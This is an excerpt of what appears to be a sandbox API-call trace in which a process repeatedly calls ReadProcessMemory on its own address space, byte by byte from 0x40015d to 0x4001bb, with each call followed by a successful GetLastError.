[0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400160, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.063] GetLastError () returned 0x0 [0085.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400161, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400162, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400163, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400164, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400165, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400166, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400167, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400168, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400169, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400170, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400171, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400172, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400173, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400174, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400175, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400176, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400177, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400178, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.064] GetLastError () returned 0x0 [0085.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400179, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400180, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400181, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400182, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400183, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400184, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400185, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400186, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400187, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400188, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400189, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400190, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.065] GetLastError () returned 0x0 [0085.065] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400191, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400192, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400193, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400194, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400195, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400196, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400197, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400198, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400199, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.066] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.066] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001aa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ab, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ac, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ad, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ae, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001af, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ba, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 [0085.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0085.067] GetLastError () returned 0x0 